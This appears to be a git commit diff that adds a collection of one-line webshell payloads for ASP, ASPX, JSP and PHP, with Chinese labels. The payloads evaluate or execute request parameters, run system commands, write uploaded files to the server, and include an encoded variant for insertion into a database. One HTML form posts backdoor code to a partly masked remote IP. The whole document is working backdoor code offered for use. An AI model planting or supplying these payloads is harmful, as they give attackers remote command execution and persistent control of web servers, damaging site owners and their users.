add the word webshell

2024-11-21 18:53:03 +00:00 · 2014-05-22 08:41:53 +08:00 · 2014-05-22 08:41:53 +08:00 · cf5003d2a2
commit cf5003d2a2
parent e60084c9e0
4 changed files with 41 additions and 0 deletions
--- a/asp/ASP一句话02.txt
+++ b/asp/ASP一句话02.txt
@ -0,0 +1,16 @@
+ASP
+
+<%eval request("sb")%>
+
+<%execute request("sb")%>
+
+%><%Eval(Request(chr(35)))%><%
+
+<%ExecuteGlobal request("sb")%>
+
+在数据库里插入的一句话木马
+
+┼攠數畣整爠煥敵瑳∨∣┩愾
+
+┼癥污爠煥敵瑳∨≡┩> 密码为: a
+
--- a/aspx/ASPX一句话02.txt
+++ b/aspx/ASPX一句话02.txt
@ -0,0 +1,7 @@
+<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
+
+< %@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
+
+<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
+
+<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
--- a/jspx/jsp一句话.txt
+++ b/jspx/jsp一句话.txt
@ -0,0 +1,9 @@
+<%
+if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
+%>
+提交客户端
+程序后门代码
+<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
+< textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
+< input type=submit value="提交">
+< /form>
--- a/php/php一句话02.txt
+++ b/php/php一句话02.txt
@ -0,0 +1,9 @@
+<?php eval($_POST[sb])?>
+
+<?php @eval($_POST[c])?>
+
+<?php system($_REQUEST['cmd']);?> 
+
+<?php assert($_POST[c]);?>
+
+<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?>